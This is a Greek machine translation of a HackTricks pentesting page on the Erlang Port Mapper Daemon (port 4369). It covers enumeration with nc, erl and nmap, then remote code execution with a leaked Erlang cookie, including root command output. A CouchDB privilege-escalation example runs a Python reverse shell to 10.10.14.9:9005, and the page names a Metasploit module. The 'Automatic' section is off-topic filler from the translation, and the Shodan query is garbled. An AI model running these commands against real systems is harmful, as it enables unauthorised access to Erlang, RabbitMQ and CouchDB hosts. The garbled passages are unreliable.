9 KiB
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Το Erlang Port Mapper Daemon (epmd) λειτουργεί ως συντονιστής για κατανεμημένα παραδείγματα της Erlang. Είναι υπεύθυνο για την αντιστοίχιση συμβολικών ονομάτων κόμβων σε διευθύνσεις μηχανών, εξασφαλίζοντας ουσιαστικά ότι κάθε όνομα κόμβου συσχετίζεται με μια συγκεκριμένη διεύθυνση. Αυτός ο ρόλος του epmd είναι κρίσιμος για την άριστη αλληλεπίδραση και επικοινωνία μεταξύ διαφορετικών κόμβων Erlang σε ένα δίκτυο.
Προεπιλεγμένη θύρα: 4369
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
Αυτό χρησιμοποιείται από προεπιλογή σε εγκαταστάσεις RabbitMQ και CouchDB.
Απαρίθμηση
Χειροκίνητη
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
Αυτόματο
Η αυτόματη λειτουργία είναι μια δυνατότητα που επιτρέπει σε ένα σύστημα ή μια εφαρμογή να λειτουργεί αυτόνομα, χωρίς την ανάμειξη ανθρώπινης παρέμβασης. Αυτό σημαίνει ότι η διαδικασία ή η ενέργεια που πραγματοποιείται εκτελείται αυτόματα, χωρίς την ανάγκη για χειροκίνητη επέμβαση.
Στο πλαίσιο του χάκινγκ, η αυτόματη λειτουργία μπορεί να αναφέρεται σε εργαλεία ή τεχνικές που εκτελούν αυτόματα επιθέσεις ή εκμεταλλεύονται ευπάθειες σε συστήματα, χωρίς την ανάγκη για χειροκίνητη παρέμβαση από τον χάκερ. Αυτό επιτρέπει στον χάκερ να εκτελεί γρήγορα και αποτελεσματικά επιθέσεις, εκμεταλλευόμενος τις αδυναμίες του συστήματος.
Η αυτόματη λειτουργία μπορεί να χρησιμοποιηθεί επίσης για την αυτόματη ανίχνευση ευπαθειών σε συστήματα, την αυτόματη σάρωση δικτύου ή την αυτόματη εκτέλεση εργασιών σε ένα σύστημα. Αυτό επιτρέπει στον χάκερ να εντοπίζει ευπάθειες και να εκτελεί επιθέσεις μεγάλης κλίμακας, χωρίς την ανάγκη για χειροκίνητη παρέμβαση.
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
Erlang Cookie RCE
Απομακρυσμένη Σύνδεση
Εάν μπορείτε να διαρρεύσετε το Authentication cookie, θα μπορείτε να εκτελέσετε κώδικα στον κεντρικό υπολογιστή. Συνήθως, αυτό το cookie βρίσκεται στο ~/.erlang.cookie
και δημιουργείται από το erlang κατά την πρώτη εκκίνηση. Εάν δεν τροποποιηθεί ή δεν οριστεί χειροκίνητα, είναι μια τυχαία συμβολοσειρά [A:Z] με μήκος 20 χαρακτήρων.
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
Περισσότερες πληροφορίες στο https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
Ο συγγραφέας μοιράζεται επίσης ένα πρόγραμμα για την αποτροπή του cookie:
{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}
Τοπική Σύνδεση
Σε αυτήν την περίπτωση θα καταχραστούμε το CouchDB για να αναβαθμίσουμε τα προνόμια τοπικά:
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Παράδειγμα που προέρχεται από https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution
Μπορείτε να χρησιμοποιήσετε τη μηχανή Canape HTB για να εξασκηθείτε στο πώς να εκμεταλλευτείτε αυτήν την ευπάθεια.
Metasploit
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
Shodan
port:4369 "στη θύρα"
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.